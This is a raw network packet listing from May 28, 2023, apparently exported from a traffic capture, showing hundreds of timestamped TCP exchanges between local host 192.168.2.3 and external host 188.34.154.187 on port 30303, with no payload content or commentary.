May 28, 2023 10:46:23.365581036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365592957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365601063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365619898 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365622044 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365639925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365643024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365660906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365664005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365681887 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365700006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365705013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365725040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365726948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365746975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365750074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365767956 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365781069 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365787983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365808964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365808964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365829945 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365830898 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365852118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365852118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365873098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365874052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365895987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365912914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365912914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365916014 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365933895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365937948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365947008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365958929 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365972042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365979910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365995884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365998983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366014004 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366019964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366034031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366041899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366058111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366061926 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366076946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366085052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366099119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366105080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366122007 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366125107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366142988 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366147041 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366163969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366168022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366184950 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366189957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366208076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366211891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366230011 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366231918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366249084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366252899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366270065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366275072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366292000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366296053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366314888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366316080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366337061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366337061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366355896 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366360903 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366375923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366381884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366396904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366403103 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366420984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366425991 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366441965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366446972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366462946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366468906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366481066 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366489887 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366503000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366511106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366523981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366532087 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366545916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366553068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366564989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366575003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366585970 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366595984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366605997 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366616011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366626024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366636992 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366645098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366658926 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366664886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366679907 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366689920 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366700888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366703033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366722107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366730928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366743088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366749048 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366764069 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366771936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366786003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366790056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366808891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366811037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366828918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366842031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366849899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366859913 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366872072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366878986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366894007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366903067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366914988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366929054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366935968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366942883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366956949 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366964102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366977930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.366982937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.366998911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367006063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367021084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367026091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367042065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367043972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367063046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367073059 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367084026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367091894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367104053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367120981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367122889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367137909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367144108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367160082 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367165089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367178917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367187023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367198944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367208958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367218971 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367229939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367240906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367249966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367260933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367271900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367280960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367294073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367304087 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367314100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367319107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367335081 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367347002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367355108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367367029 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367376089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367387056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367397070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367408037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367418051 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367429972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367440939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367455959 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367460966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367474079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367481947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367495060 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367501974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367516041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367525101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367533922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367543936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367553949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367564917 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367575884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367588043 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367594957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367609024 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367621899 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367628098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367639065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367650032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367660046 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367671967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367680073 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367692947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367698908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367712975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367722034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367734909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367741108 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367754936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367764950 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367775917 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367785931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367796898 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367806911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367820024 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367824078 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367841005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367856026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367861032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367872953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367882013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367892981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367904902 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367913961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367925882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367937088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367949009 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367953062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367969990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.367979050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.367990971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368009090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368010998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368020058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368031025 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368045092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368052006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368066072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368072987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368084908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368093014 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368108034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368113995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368129969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368134022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368149042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368155003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368171930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368177891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368194103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368199110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368215084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368221045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368235111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368243933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368254900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368273973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368280888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368295908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368295908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368316889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368324995 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368338108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368341923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368359089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368366957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368380070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368390083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368402004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368406057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368422031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368432999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368443966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368453979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368467093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368470907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368488073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368499994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368508101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368522882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368530989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368547916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368551016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368566990 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368571997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368587017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368592978 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368613958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368633032 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368633986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368633032 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368654013 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368655920 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368674994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368678093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368697882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368697882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368716955 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368721962 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368740082 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368741989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368757963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368763924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368782997 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368784904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368807077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368813992 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368825912 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368845940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368849993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368849993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368860960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368866920 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368880987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368887901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368905067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368907928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368923903 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368931055 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368951082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368953943 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368967056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.368972063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.368993044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369012117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369013071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369013071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369026899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369045019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369048119 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369069099 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369070053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369088888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369106054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369111061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369131088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369138002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369151115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369152069 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369165897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369172096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369188070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369193077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369213104 CEST	30303	49685	188.34.154.187	192.168.2.3
